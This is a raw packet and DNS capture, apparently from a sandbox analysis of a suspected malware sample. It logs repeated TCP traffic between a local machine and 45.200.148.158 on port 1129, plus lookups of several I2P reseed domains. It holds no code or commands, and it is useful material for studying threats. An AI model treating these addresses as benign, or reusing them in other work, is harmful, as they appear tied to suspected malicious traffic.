                                                                                                                                                Jan 5, 2025 17:49:12.762787104 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.762804985 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.763497114 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.763508081 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.763525963 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.763535023 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.763564110 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.763582945 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.764117956 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.764130116 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.764143944 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.764187098 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.778743029 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.778806925 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.778819084 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.778820038 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.778835058 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.778858900 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.778872013 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.778888941 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.778903008 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.778913021 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.778914928 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.778947115 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.779122114 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.779133081 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.779151917 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.779160976 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.779176950 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.779206991 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.779674053 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.779685020 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.779715061 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.779730082 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.779725075 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.779762983 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.780204058 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.780255079 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.780272961 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.780282974 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.780293941 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.780303955 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.780314922 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.780344009 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.780369997 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.780380964 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.780422926 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.831943989 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.831969976 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.831981897 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.832026958 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.832029104 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.832040071 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.832077026 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.832096100 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.832122087 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.832134962 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.832138062 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.832173109 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.832176924 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.832340956 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.832381010 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.832391024 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.846904039 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.846916914 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.846929073 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.846941948 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.846951008 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.846951962 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.846962929 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.846977949 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.846991062 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.847008944 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.847158909 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860265017 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860277891 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860285997 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860330105 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860332012 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.860342979 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860356092 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860368013 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860388994 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.860414028 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860414982 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.860435963 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860445976 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860481977 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.860855103 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860882998 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860893011 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.860897064 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.860937119 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.861361027 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861373901 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861385107 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861412048 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.861506939 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861520052 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861531973 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861541986 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.861547947 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.861569881 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.913355112 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913371086 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913394928 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913400888 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913408041 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913413048 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.913420916 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913435936 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913448095 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913460016 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913472891 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.913506985 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.913521051 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.928034067 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928057909 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928069115 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928107023 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.928136110 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.928210020 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928222895 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928230047 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928241968 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.928261995 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.928273916 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.928347111 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942075014 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942085981 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942097902 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942111969 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942122936 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942137003 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942158937 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942176104 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942300081 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942313910 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942342997 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942347050 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942383051 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942384958 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942394972 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942406893 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942429066 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942557096 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942572117 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942581892 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942595959 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942616940 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942797899 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942807913 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942819118 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942831039 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942843914 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942846060 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942859888 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942867041 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942873955 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942887068 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.942895889 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.942924023 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.994751930 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.994764090 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.994815111 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.994842052 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.994961023 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995006084 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.995847940 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995922089 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995933056 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995944023 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995956898 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995970011 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.995989084 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.996016979 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:12.996130943 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.996170044 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.996181011 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:12.996217966 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.009790897 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009835958 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.009859085 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009870052 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009880066 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009893894 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009903908 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009903908 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.009933949 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.009979010 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.009990931 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.010003090 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.010025978 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.010056019 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.023917913 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.023937941 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.023948908 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.023981094 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.023991108 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024022102 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024068117 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024081945 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024094105 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024106026 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024116993 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024116993 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024141073 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024148941 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024158001 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024169922 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024190903 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024205923 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024554968 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024565935 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024576902 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024589062 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024599075 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024600029 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024612904 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024636984 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024662018 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.024744987 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.024777889 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.025041103 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.077269077 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.077290058 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.077341080 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.077351093 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.078495026 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.078525066 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.078536987 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.078547955 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.078567982 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.078596115 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.078665018 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.078676939 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.078687906 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.078699112 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.078711033 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.078727961 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.091492891 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.091506004 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.091517925 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.091558933 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.091594934 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.092031956 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.092053890 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.092065096 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.092080116 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.092092037 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.092097998 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.092102051 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.092118979 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.092142105 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.105762005 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.105792999 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.105802059 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.105861902 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.106241941 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106290102 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106303930 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106340885 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.106348038 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106359005 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106372118 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106374025 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.106384039 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106394053 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.106427908 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.106525898 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106538057 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106548071 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106569052 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.106823921 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106836081 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106857061 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106863976 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.106884956 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106897116 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.106899023 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106913090 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106926918 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.106952906 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.106988907 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.159220934 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.159245968 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.159257889 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.159322023 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:13.163642883 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.163660049 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.163672924 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.163693905 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:13.163706064 CET11294970445.200.148.158192.168.2.5

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Jan 5, 2025 17:49:40.057634115 CET192.168.2.51.1.1.10x7907Standard query (0)reseed.memcpy.ioA (IP address)IN (0x0001)false
                                                                                                                                                Jan 5, 2025 17:49:41.396738052 CET192.168.2.51.1.1.10xe213Standard query (0)reseed-pl.i2pd.xyzA (IP address)IN (0x0001)false
                                                                                                                                                Jan 5, 2025 17:49:43.648171902 CET192.168.2.51.1.1.10xe25fStandard query (0)reseed.i2pgit.orgA (IP address)IN (0x0001)false
                                                                                                                                                Jan 5, 2025 17:51:00.264415979 CET192.168.2.51.1.1.10x12ecStandard query (0)reseed.onion.imA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Jan 5, 2025 17:49:12.673886061 CET1.1.1.1192.168.2.50xef5bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                Jan 5, 2025 17:49:12.673886061 CET1.1.1.1192.168.2.50xef5bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                Jan 5, 2025 17:49:40.067955971 CET1.1.1.1192.168.2.50x7907No error (0)reseed.memcpy.io95.216.2.172A (IP address)IN (0x0001)false
